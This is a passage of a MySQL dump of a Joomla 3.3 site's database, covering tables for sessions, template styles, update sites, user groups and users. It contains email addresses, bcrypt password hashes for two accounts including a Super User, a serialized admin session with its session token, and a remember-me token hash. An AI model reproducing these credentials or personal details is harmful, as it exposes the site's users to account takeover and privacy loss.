LOCK TABLES `qo1a2_redirect_links` WRITE; /*!40000 ALTER TABLE `qo1a2_redirect_links` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_redirect_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_schemas` -- DROP TABLE IF EXISTS `qo1a2_schemas`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_schemas` ( `extension_id` int(11) NOT NULL, `version_id` varchar(20) NOT NULL, PRIMARY KEY (`extension_id`,`version_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_schemas` -- LOCK TABLES `qo1a2_schemas` WRITE; /*!40000 ALTER TABLE `qo1a2_schemas` DISABLE KEYS */; INSERT INTO `qo1a2_schemas` VALUES (700,'3.3.6-2014-09-30'); /*!40000 ALTER TABLE `qo1a2_schemas` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_session` -- DROP TABLE IF EXISTS `qo1a2_session`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_session` ( `session_id` varchar(200) NOT NULL DEFAULT '', `client_id` tinyint(3) unsigned NOT NULL DEFAULT '0', `guest` tinyint(4) unsigned DEFAULT '1', `time` varchar(14) DEFAULT '', `data` mediumtext, `userid` int(11) DEFAULT '0', `username` varchar(150) DEFAULT '', PRIMARY KEY (`session_id`), KEY `userid` (`userid`), KEY `time` (`time`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_session` -- LOCK TABLES `qo1a2_session` WRITE; /*!40000 ALTER TABLE `qo1a2_session` DISABLE KEYS */; INSERT INTO `qo1a2_session` VALUES ('ugujv94i48dnjphdpoqijlr7j5',0,0,'1416058107','__default|a:8:{s:15:\"session.counter\";i:201;s:19:\"session.timer.start\";i:1415890067;s:18:\"session.timer.last\";i:1416057267;s:17:\"session.timer.now\";i:1416058107;s:22:\"session.client.browser\";s:105:\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36\";s:8:\"registry\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\\0\\0\\0data\";O:8:\"stdClass\":2:{s:5:\"users\";O:8:\"stdClass\":1:{s:5:\"login\";O:8:\"stdClass\":1:{s:4:\"form\";O:8:\"stdClass\":2:{s:6:\"return\";s:20:\"index.php?Itemid=101\";s:4:\"data\";a:0:{}}}}s:13:\"rememberLogin\";b:1;}}s:4:\"user\";O:5:\"JUser\":27:{s:9:\"\\0\\0\\0isRoot\";b:1;s:2:\"id\";s:3:\"574\";s:4:\"name\";s:10:\"Super User\";s:8:\"username\";s:7:\"joomla3\";s:5:\"email\";s:16:\"piratolli@t9s.de\";s:8:\"password\";s:60:\"$2y$10$B./nsRhC8MqM4IHiosz1xOiM5MsM69Driw6YLsP0BxnBd6nHoQcWC\";s:14:\"password_clear\";s:0:\"\";s:5:\"block\";s:1:\"0\";s:9:\"sendEmail\";s:1:\"1\";s:12:\"registerDate\";s:19:\"2014-11-13 14:47:34\";s:13:\"lastvisitDate\";s:19:\"0000-00-00 00:00:00\";s:10:\"activation\";s:1:\"0\";s:6:\"params\";s:0:\"\";s:6:\"groups\";a:1:{i:8;s:1:\"8\";}s:5:\"guest\";i:0;s:13:\"lastResetTime\";s:19:\"0000-00-00 00:00:00\";s:10:\"resetCount\";s:1:\"0\";s:12:\"requireReset\";s:1:\"0\";s:10:\"\\0\\0\\0_params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\\0\\0\\0data\";O:8:\"stdClass\":0:{}}s:14:\"\\0\\0\\0_authGroups\";a:2:{i:0;i:1;i:1;i:8;}s:14:\"\\0\\0\\0_authLevels\";a:5:{i:0;i:1;i:1;i:1;i:2;i:2;i:3;i:3;i:4;i:6;}s:15:\"\\0\\0\\0_authActions\";N;s:12:\"\\0\\0\\0_errorMsg\";N;s:10:\"\\0\\0\\0_errors\";a:0:{}s:3:\"aid\";i:0;s:6:\"otpKey\";s:0:\"\";s:4:\"otep\";s:0:\"\";}s:13:\"session.token\";s:32:\"fc83b6bde5d77486f0b0bc71655c4357\";}',574,'joomla3'); /*!40000 ALTER TABLE `qo1a2_session` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_tags` -- DROP TABLE IF EXISTS `qo1a2_tags`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_tags` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `parent_id` int(10) unsigned NOT NULL DEFAULT '0', `lft` int(11) NOT NULL DEFAULT '0', `rgt` int(11) NOT NULL DEFAULT '0', `level` int(10) unsigned NOT NULL DEFAULT '0', `path` varchar(255) NOT NULL DEFAULT '', `title` varchar(255) NOT NULL, `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `note` varchar(255) NOT NULL DEFAULT '', `description` mediumtext NOT NULL, `published` tinyint(1) NOT NULL DEFAULT '0', `checked_out` int(11) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `access` int(10) unsigned NOT NULL DEFAULT '0', `params` text NOT NULL, `metadesc` varchar(1024) NOT NULL COMMENT 'The meta description for the page.', `metakey` varchar(1024) NOT NULL COMMENT 'The meta keywords for the page.', `metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.', `created_user_id` int(10) unsigned NOT NULL DEFAULT '0', `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created_by_alias` varchar(255) NOT NULL DEFAULT '', `modified_user_id` int(10) unsigned NOT NULL DEFAULT '0', `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `images` text NOT NULL, `urls` text NOT NULL, `hits` int(10) unsigned NOT NULL DEFAULT '0', `language` char(7) NOT NULL, `version` int(10) unsigned NOT NULL DEFAULT '1', `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', PRIMARY KEY (`id`), KEY `tag_idx` (`published`,`access`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_path` (`path`), KEY `idx_left_right` (`lft`,`rgt`), KEY `idx_alias` (`alias`), KEY `idx_language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_tags` -- LOCK TABLES `qo1a2_tags` WRITE; /*!40000 ALTER TABLE `qo1a2_tags` DISABLE KEYS */; INSERT INTO `qo1a2_tags` VALUES (1,0,0,1,0,'','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'','','','',0,'2011-01-01 00:00:01','',0,'0000-00-00 00:00:00','','',0,'*',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'); /*!40000 ALTER TABLE `qo1a2_tags` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_template_styles` -- DROP TABLE IF EXISTS `qo1a2_template_styles`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_template_styles` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `template` varchar(50) NOT NULL DEFAULT '', `client_id` tinyint(1) unsigned NOT NULL DEFAULT '0', `home` char(7) NOT NULL DEFAULT '0', `title` varchar(255) NOT NULL DEFAULT '', `params` text NOT NULL, PRIMARY KEY (`id`), KEY `idx_template` (`template`), KEY `idx_home` (`home`) ) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_template_styles` -- LOCK TABLES `qo1a2_template_styles` WRITE; /*!40000 ALTER TABLE `qo1a2_template_styles` DISABLE KEYS */; INSERT INTO `qo1a2_template_styles` VALUES (4,'beez3',0,'0','Beez3 - Default','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"logo\":\"images\\/joomla_black.gif\",\"sitetitle\":\"Joomla!\",\"sitedescription\":\"Open Source Content Management\",\"navposition\":\"left\",\"templatecolor\":\"personal\",\"html5\":\"0\"}'),(5,'hathor',1,'0','Hathor - Default','{\"showSiteName\":\"0\",\"colourChoice\":\"\",\"boldText\":\"0\"}'),(7,'protostar',0,'1','protostar - Default','{\"templateColor\":\"\",\"logoFile\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}'),(8,'isis',1,'1','isis - Default','{\"templateColor\":\"\",\"logoFile\":\"\"}'); /*!40000 ALTER TABLE `qo1a2_template_styles` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_ucm_base` -- DROP TABLE IF EXISTS `qo1a2_ucm_base`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_ucm_base` ( `ucm_id` int(10) unsigned NOT NULL, `ucm_item_id` int(10) NOT NULL, `ucm_type_id` int(11) NOT NULL, `ucm_language_id` int(11) NOT NULL, PRIMARY KEY (`ucm_id`), KEY `idx_ucm_item_id` (`ucm_item_id`), KEY `idx_ucm_type_id` (`ucm_type_id`), KEY `idx_ucm_language_id` (`ucm_language_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_ucm_base` -- LOCK TABLES `qo1a2_ucm_base` WRITE; /*!40000 ALTER TABLE `qo1a2_ucm_base` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_ucm_base` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_ucm_content` -- DROP TABLE IF EXISTS `qo1a2_ucm_content`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_ucm_content` ( `core_content_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `core_type_alias` varchar(255) NOT NULL DEFAULT '' COMMENT 'FK to the content types table', `core_title` varchar(255) NOT NULL, `core_alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `core_body` mediumtext NOT NULL, `core_state` tinyint(1) NOT NULL DEFAULT '0', `core_checked_out_time` varchar(255) NOT NULL DEFAULT '', `core_checked_out_user_id` int(10) unsigned NOT NULL DEFAULT '0', `core_access` int(10) unsigned NOT NULL DEFAULT '0', `core_params` text NOT NULL, `core_featured` tinyint(4) unsigned NOT NULL DEFAULT '0', `core_metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.', `core_created_user_id` int(10) unsigned NOT NULL DEFAULT '0', `core_created_by_alias` varchar(255) NOT NULL DEFAULT '', `core_created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `core_modified_user_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Most recent user that modified', `core_modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `core_language` char(7) NOT NULL, `core_publish_up` datetime NOT NULL, `core_publish_down` datetime NOT NULL, `core_content_item_id` int(10) unsigned DEFAULT NULL COMMENT 'ID from the individual type table', `asset_id` int(10) unsigned DEFAULT NULL COMMENT 'FK to the #__assets table.', `core_images` text NOT NULL, `core_urls` text NOT NULL, `core_hits` int(10) unsigned NOT NULL DEFAULT '0', `core_version` int(10) unsigned NOT NULL DEFAULT '1', `core_ordering` int(11) NOT NULL DEFAULT '0', `core_metakey` text NOT NULL, `core_metadesc` text NOT NULL, `core_catid` int(10) unsigned NOT NULL DEFAULT '0', `core_xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', `core_type_id` int(10) unsigned DEFAULT NULL, PRIMARY KEY (`core_content_id`), KEY `tag_idx` (`core_state`,`core_access`), KEY `idx_access` (`core_access`), KEY `idx_alias` (`core_alias`), KEY `idx_language` (`core_language`), KEY `idx_title` (`core_title`), KEY `idx_modified_time` (`core_modified_time`), KEY `idx_created_time` (`core_created_time`), KEY `idx_content_type` (`core_type_alias`), KEY `idx_core_modified_user_id` (`core_modified_user_id`), KEY `idx_core_checked_out_user_id` (`core_checked_out_user_id`), KEY `idx_core_created_user_id` (`core_created_user_id`), KEY `idx_core_type_id` (`core_type_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Contains core content data in name spaced fields'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_ucm_content` -- LOCK TABLES `qo1a2_ucm_content` WRITE; /*!40000 ALTER TABLE `qo1a2_ucm_content` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_ucm_content` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_ucm_history` -- DROP TABLE IF EXISTS `qo1a2_ucm_history`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_ucm_history` ( `version_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `ucm_item_id` int(10) unsigned NOT NULL, `ucm_type_id` int(10) unsigned NOT NULL, `version_note` varchar(255) NOT NULL DEFAULT '' COMMENT 'Optional version name', `save_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `editor_user_id` int(10) unsigned NOT NULL DEFAULT '0', `character_count` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Number of characters in this version.', `sha1_hash` varchar(50) NOT NULL DEFAULT '' COMMENT 'SHA1 hash of the version_data column.', `version_data` mediumtext NOT NULL COMMENT 'json-encoded string of version data', `keep_forever` tinyint(4) NOT NULL DEFAULT '0' COMMENT '0=auto delete; 1=keep', PRIMARY KEY (`version_id`), KEY `idx_ucm_item_id` (`ucm_type_id`,`ucm_item_id`), KEY `idx_save_date` (`save_date`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_ucm_history` -- LOCK TABLES `qo1a2_ucm_history` WRITE; /*!40000 ALTER TABLE `qo1a2_ucm_history` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_ucm_history` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_update_sites` -- DROP TABLE IF EXISTS `qo1a2_update_sites`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_update_sites` ( `update_site_id` int(11) NOT NULL AUTO_INCREMENT, `name` varchar(100) DEFAULT '', `type` varchar(20) DEFAULT '', `location` text NOT NULL, `enabled` int(11) DEFAULT '0', `last_check_timestamp` bigint(20) DEFAULT '0', `extra_query` varchar(1000) DEFAULT '', PRIMARY KEY (`update_site_id`) ) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='Update Sites'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_update_sites` -- LOCK TABLES `qo1a2_update_sites` WRITE; /*!40000 ALTER TABLE `qo1a2_update_sites` DISABLE KEYS */; INSERT INTO `qo1a2_update_sites` VALUES (1,'Joomla! Core','collection','http://update.joomla.org/core/list.xml',1,1415890186,''),(2,'Joomla! Extension Directory','collection','http://update.joomla.org/jed/list.xml',1,1415890186,''),(3,'Accredited Joomla! Translations','collection','http://update.joomla.org/language/translationlist_3.xml',1,1415890184,''),(4,'Joomla! Update Component Update Site','extension','http://update.joomla.org/core/extensions/com_joomlaupdate.xml',1,1415890184,''); /*!40000 ALTER TABLE `qo1a2_update_sites` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_update_sites_extensions` -- DROP TABLE IF EXISTS `qo1a2_update_sites_extensions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_update_sites_extensions` ( `update_site_id` int(11) NOT NULL DEFAULT '0', `extension_id` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`update_site_id`,`extension_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Links extensions to update sites'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_update_sites_extensions` -- LOCK TABLES `qo1a2_update_sites_extensions` WRITE; /*!40000 ALTER TABLE `qo1a2_update_sites_extensions` DISABLE KEYS */; INSERT INTO `qo1a2_update_sites_extensions` VALUES (1,700),(2,700),(3,600),(4,28); /*!40000 ALTER TABLE `qo1a2_update_sites_extensions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_updates` -- DROP TABLE IF EXISTS `qo1a2_updates`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_updates` ( `update_id` int(11) NOT NULL AUTO_INCREMENT, `update_site_id` int(11) DEFAULT '0', `extension_id` int(11) DEFAULT '0', `name` varchar(100) DEFAULT '', `description` text NOT NULL, `element` varchar(100) DEFAULT '', `type` varchar(20) DEFAULT '', `folder` varchar(20) DEFAULT '', `client_id` tinyint(3) DEFAULT '0', `version` varchar(32) DEFAULT '', `data` text NOT NULL, `detailsurl` text NOT NULL, `infourl` text NOT NULL, `extra_query` varchar(1000) DEFAULT '', PRIMARY KEY (`update_id`) ) ENGINE=InnoDB AUTO_INCREMENT=24 DEFAULT CHARSET=utf8 COMMENT='Available Updates'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_updates` -- LOCK TABLES `qo1a2_updates` WRITE; /*!40000 ALTER TABLE `qo1a2_updates` DISABLE KEYS */; INSERT INTO `qo1a2_updates` VALUES (1,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.3.3.3','','http://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3,3,0,'Syriac','','pkg_sy-IQ','package','',0,'3.3.4.1','','http://update.joomla.org/language/details3/sy-IQ_details.xml','',''),(4,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5,3,0,'Thai','','pkg_th-TH','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/th-TH_details.xml','',''),(6,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.3.5.1','','http://update.joomla.org/language/details3/tr-TR_details.xml','',''),(7,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.3.3.15','','http://update.joomla.org/language/details3/uk-UA_details.xml','',''),(8,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.3.0.1','','http://update.joomla.org/language/details3/ug-CN_details.xml','',''),(9,3,0,'Albanian','','pkg_sq-AL','package','',0,'3.1.1.1','','http://update.joomla.org/language/details3/sq-AL_details.xml','',''),(10,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.0.2.1','','http://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.3.4.1','','http://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12,3,0,'Spanish','','pkg_es-ES','package','',0,'3.3.4.1','','http://update.joomla.org/language/details3/es-ES_details.xml','',''),(13,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.3.3.1','','http://update.joomla.org/language/details3/bs-BA_details.xml','',''),(14,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/sr-RS_details.xml','',''),(15,3,0,'Vietnamese','','pkg_vi-VN','package','',0,'3.2.1.1','','http://update.joomla.org/language/details3/vi-VN_details.xml','',''),(16,3,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'3.3.0.2','','http://update.joomla.org/language/details3/id-ID_details.xml','',''),(17,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.3.4.1','','http://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19,3,0,'Montenegrin','','pkg_srp-ME','package','',0,'3.3.1.1','','http://update.joomla.org/language/details3/srp-ME_details.xml','',''),(20,3,0,'EnglishCA','','pkg_en-CA','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/en-CA_details.xml','',''),(21,3,0,'FrenchCA','','pkg_fr-CA','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/fr-CA_details.xml','',''),(22,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.3.0.1','','http://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23,3,0,'Sinhala','','pkg_si-LK','package','',0,'3.3.1.1','','http://update.joomla.org/language/details3/si-LK_details.xml','',''); /*!40000 ALTER TABLE `qo1a2_updates` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_user_keys` -- DROP TABLE IF EXISTS `qo1a2_user_keys`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_user_keys` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `user_id` varchar(255) NOT NULL, `token` varchar(255) NOT NULL, `series` varchar(255) NOT NULL, `invalid` tinyint(4) NOT NULL, `time` varchar(200) NOT NULL, `uastring` varchar(255) NOT NULL, PRIMARY KEY (`id`), UNIQUE KEY `series` (`series`), UNIQUE KEY `series_2` (`series`), UNIQUE KEY `series_3` (`series`), KEY `user_id` (`user_id`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_user_keys` -- LOCK TABLES `qo1a2_user_keys` WRITE; /*!40000 ALTER TABLE `qo1a2_user_keys` DISABLE KEYS */; INSERT INTO `qo1a2_user_keys` VALUES (1,'joomla3','$2y$10$R9zTBkE/AZaCs124Ib5Rf.5wCXKwnxrotltJrY3uahwWJ.hgnB1z.','j1i6T94UiRRQdl2eWdjm',0,'1421074086','63967bbd967cb19f2d9a107e5f57b9f0'); /*!40000 ALTER TABLE `qo1a2_user_keys` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_user_notes` -- DROP TABLE IF EXISTS `qo1a2_user_notes`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_user_notes` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `user_id` int(10) unsigned NOT NULL DEFAULT '0', `catid` int(10) unsigned NOT NULL DEFAULT '0', `subject` varchar(100) NOT NULL DEFAULT '', `body` text NOT NULL, `state` tinyint(3) NOT NULL DEFAULT '0', `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created_user_id` int(10) unsigned NOT NULL DEFAULT '0', `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_user_id` int(10) unsigned NOT NULL, `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `review_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', PRIMARY KEY (`id`), KEY `idx_user_id` (`user_id`), KEY `idx_category_id` (`catid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_user_notes` -- LOCK TABLES `qo1a2_user_notes` WRITE; /*!40000 ALTER TABLE `qo1a2_user_notes` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_user_notes` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_user_profiles` -- DROP TABLE IF EXISTS `qo1a2_user_profiles`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_user_profiles` ( `user_id` int(11) NOT NULL, `profile_key` varchar(100) NOT NULL, `profile_value` text NOT NULL, `ordering` int(11) NOT NULL DEFAULT '0', UNIQUE KEY `idx_user_id_profile_key` (`user_id`,`profile_key`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Simple user profile storage table'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_user_profiles` -- LOCK TABLES `qo1a2_user_profiles` WRITE; /*!40000 ALTER TABLE `qo1a2_user_profiles` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_user_profiles` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_user_usergroup_map` -- DROP TABLE IF EXISTS `qo1a2_user_usergroup_map`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_user_usergroup_map` ( `user_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Foreign Key to #__users.id', `group_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Foreign Key to #__usergroups.id', PRIMARY KEY (`user_id`,`group_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_user_usergroup_map` -- LOCK TABLES `qo1a2_user_usergroup_map` WRITE; /*!40000 ALTER TABLE `qo1a2_user_usergroup_map` DISABLE KEYS */; INSERT INTO `qo1a2_user_usergroup_map` VALUES (574,8),(575,2); /*!40000 ALTER TABLE `qo1a2_user_usergroup_map` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_usergroups` -- DROP TABLE IF EXISTS `qo1a2_usergroups`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_usergroups` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key', `parent_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Adjacency List Reference Id', `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.', `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.', `title` varchar(100) NOT NULL DEFAULT '', PRIMARY KEY (`id`), UNIQUE KEY `idx_usergroup_parent_title_lookup` (`parent_id`,`title`), KEY `idx_usergroup_title_lookup` (`title`), KEY `idx_usergroup_adjacency_lookup` (`parent_id`), KEY `idx_usergroup_nested_set_lookup` (`lft`,`rgt`) USING BTREE ) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_usergroups` -- LOCK TABLES `qo1a2_usergroups` WRITE; /*!40000 ALTER TABLE `qo1a2_usergroups` DISABLE KEYS */; INSERT INTO `qo1a2_usergroups` VALUES (1,0,1,18,'Public'),(2,1,8,15,'Registered'),(3,2,9,14,'Author'),(4,3,10,13,'Editor'),(5,4,11,12,'Publisher'),(6,1,4,7,'Manager'),(7,6,5,6,'Administrator'),(8,1,16,17,'Super Users'),(9,1,2,3,'Guest'); /*!40000 ALTER TABLE `qo1a2_usergroups` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_users` -- DROP TABLE IF EXISTS `qo1a2_users`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_users` ( `id` int(11) NOT NULL AUTO_INCREMENT, `name` varchar(255) NOT NULL DEFAULT '', `username` varchar(150) NOT NULL DEFAULT '', `email` varchar(100) NOT NULL DEFAULT '', `password` varchar(100) NOT NULL DEFAULT '', `block` tinyint(4) NOT NULL DEFAULT '0', `sendEmail` tinyint(4) DEFAULT '0', `registerDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `lastvisitDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `activation` varchar(100) NOT NULL DEFAULT '', `params` text NOT NULL, `lastResetTime` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Date of last password reset', `resetCount` int(11) NOT NULL DEFAULT '0' COMMENT 'Count of password resets since lastResetTime', `otpKey` varchar(1000) NOT NULL DEFAULT '' COMMENT 'Two factor authentication encrypted keys', `otep` varchar(1000) NOT NULL DEFAULT '' COMMENT 'One time emergency passwords', `requireReset` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Require user to reset password on next login', PRIMARY KEY (`id`), KEY `idx_name` (`name`), KEY `idx_block` (`block`), KEY `username` (`username`), KEY `email` (`email`) ) ENGINE=InnoDB AUTO_INCREMENT=576 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_users` -- LOCK TABLES `qo1a2_users` WRITE; /*!40000 ALTER TABLE `qo1a2_users` DISABLE KEYS */; INSERT INTO `qo1a2_users` VALUES (574,'Super User','joomla3','piratolli@t9s.de','$2y$10$B./nsRhC8MqM4IHiosz1xOiM5MsM69Driw6YLsP0BxnBd6nHoQcWC',0,1,'2014-11-13 14:47:34','2014-11-13 18:24:15','0','','0000-00-00 00:00:00',0,'','',0),(575,'Olli','olli','olli-graf@t9s.de','$2y$10$JmRxUjaafT1ELrKXHRKx2.A9bcKnY0HnvI.P0cuYRbIWSdTYxR/AG',0,0,'2014-11-13 14:50:58','0000-00-00 